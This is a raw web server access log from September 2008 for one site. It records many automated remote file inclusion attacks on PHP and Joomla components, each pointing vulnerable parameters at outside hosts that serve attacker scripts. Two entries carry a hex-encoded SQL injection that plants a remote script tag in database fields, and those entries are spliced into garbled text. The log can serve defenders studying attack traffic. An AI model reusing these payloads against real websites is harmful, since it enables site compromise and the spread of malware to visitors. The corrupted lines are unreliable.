83.64.132.254 - - [22/Sep/2008:09:24:08 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.40.7.214 - - [22/Sep/2008:09:24:14 -0700] "GET /logs/access_080829.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:24:20 -0700] "GET /logs/access_070719.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:24:33 -0700] "GET /logs/access_080831.log//administrator/index.php?option=com_pollxt=&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.19.79.209 - - [22/Sep/2008:09:24:43 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "www.dmulk.com"
141.44.140.111 - - [22/Sep/2008:09:24:45 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [22/Sep/2008:09:24:53 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:09:24:55 -0700] "GET /logs/access_080227.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:09:24:57 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:24:58 -0700] "GET /logs/access_080812.log//administrator/index.php?option=com_pollxt=&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:09:24:59 -0700] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.59.176 - - [22/Sep/2008:09:25:36 -0700] "GET /logs/access_080620.log//modules/userstop/userstop.php?exbb[home_path]=http://www.hosernews.ca/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.59.176 - - [22/Sep/2008:09:25:37 -0700] "GET //modules/userstop/userstop.php?exbb[home_path]=http://www.hosernews.ca/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:25:37 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.59.176 - - [22/Sep/2008:09:25:37 -0700] "GET /logs//modules/userstop/userstop.php?exbb[home_path]=http://www.hosernews.ca/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:25:37 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:25:38 -0700] "GET /phphtml.php?htmlclass_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:25:38 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:25:39 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 200 95045 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:25:46 -0700] "GET /logs/access_080905.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:25:46 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:25:46 -0700] "GET /logs/access_080710.log/phphtml.php?htmlclass_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:25:47 -0700] "GET /logs//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:26:03 -0700] "GET /logs/access_080624.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:26:03 -0700] "GET /logs/access_070719.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:26:03 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:26:03 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.122.81.86 - - [22/Sep/2008:09:26:09 -0700] "GET /logs/access_080418.log//modules/character_roster/include.php?mod_root=http://geocities.com/jticrew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.222.221 - - [22/Sep/2008:09:26:11 -0700] "GET /logs//modules/character_roster/include.php?mod_root=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.222.221 - - [22/Sep/2008:09:26:11 -0700] "GET //modules/character_roster/include.php?mod_root=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.78.135 - - [22/Sep/2008:09:26:16 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images//stories/food/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.78.135 - - [22/Sep/2008:09:26:18 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images//stories/food/sistem.txt? HTTP/1.1" 200 95347 "-" "libwww-perl/5.76" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:09:26:23 -0700] "GET /logs/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:09:26:24 -0700] "GET /index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do? HTTP/1.1" 200 94928 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:26:39 -0700] "GET /logs/access_080229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.192.68.65 - - [22/Sep/2008:09:26:59 -0700] "GET /logs//include/write.php?dir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.65 - - [22/Sep/2008:09:26:59 -0700] "GET //include/write.php?dir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:26:59 -0700] "GET /logs/access_080408.log%20/pages.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.65 - - [22/Sep/2008:09:27:19 -0700] "GET //include/write.php?dir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.137.102.170 - - [22/Sep/2008:09:27:23 -0700] "GET /logs/access_080117.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B4paginalldm/us1:189.161.985.137.102.170 - - [22/Sep/2008:09:27:24 -0700] "GET /logs/access_080117.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40lingeriestoreusa/us2:64.80.126.137.161 - - [22/Sep/2008:09:27:27 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:27:28 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:27:29 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:27:40 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:27:42 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:27:53 -0700] "GET /logs/access_080522.log/show.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:27:57 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 1245184 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:28:00 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 1310720 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:28:13 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:28:18 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 1310720 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:28:36 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 1572864 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:28:39 -0700] "GET /logs/access_080129.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:28:39 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 1441792 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:28:40 -0700] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.21.79.130 - - [22/Sep/2008:09:28:40 -0700] "GET /logs/access_070908.log HTTP/1.1" 200 91498 "http://search.yahoo.com/search?p=%2B7+++++++++++++++++%40yahoo.com++++++++++++++++++++++++++++++%40gmail.com+++++++++++++++++++++++++++txt&ei=UTF-8&fr=sfp&xargs=0&pstart=1&b=21&xa=jcuLI_vyPDKsmB4L1q1ufQ--,1222186376" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:09:28:42 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:28:45 -0700] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:29:05 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 2097152 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:29:11 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 2162688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:09:29:12 -0700] "GET ///vwar/backup/errors.php?error=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:29:12 -0700] "GET //?path%5Bdocroot%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 94714 "-" "libwww-perl/5.76" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:29:12 -0700] "GET /logs/access_080522.log/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:29:12 -0700] "GET /logs/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:29:13 -0700] "GET /logs/access_080226.log/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:29:13 -0700] "GET /index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 200 94964 "-" "libwww-perl/5.805" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:29:32 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:29:39 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 2097152 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:29:42 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:29:42 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:29:46 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:29:46 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:29:48 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:29:49 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:09:29:53 -0700] "GET /logs/access_080723.log/loadenv.inc.php?DOCUMENT_ROOT=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:09:29:53 -0700] "GET /loadenv.inc.php?DOCUMENT_ROOT=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:09:29:53 -0700] "GET /logs/loadenv.inc.php?DOCUMENT_ROOT=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:30:00 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 1376256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:30:01 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 1376256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:09:30:02 -0700] "GET /logs/access_080904.log/loadenv.inc.php?DOCUMENT_ROOT=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:30:06 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:30:06 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:30:11 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:30:13 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:30:18 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:30:20 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 1376256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:30:20 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:09:30:26 -0700] "GET //components/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:30:28 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:30:28 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:30:30 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:09:30:31 -0700] "GET /bikes/occcb/?S=A HTTP/1.0" 200 817 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:31:02 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 2686976 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:31:24 -0700] "GET /logs/access_080703.log HTTP/1.1" 200 3826290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:31:41 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:31:41 -0700] "GET ///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:31:42 -0700] "GET /logs///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
141.44.140.111 - - [22/Sep/2008:09:31:47 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [22/Sep/2008:09:31:47 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.126.137.161 - - [22/Sep/2008:09:31:48 -0700] "GET /logs/access_080702.log HTTP/1.1" 200 3387225 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:09:31:50 -0700] "GET /logs//components/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:09:31:51 -0700] "GET //components/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:31:59 -0700] "GET /logs/access_080608.log/index1.php?choix=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:31:59 -0700] "GET /index1.php?choix=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:31:59 -0700] "GET /logs/index1.php?choix=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:32:00 -0700] "GET /logs/access_080507.log/index1.php?choix=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:32:07 -0700] "GET /logs/access_080714.log//administrator/index.php?option=com_linkdirectory&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:32:07 -0700] "GET //administrator/index.php?option=com_linkdirectory&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:32:08 -0700] "GET /logs//administrator/index.php?option=com_linkdirectory&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
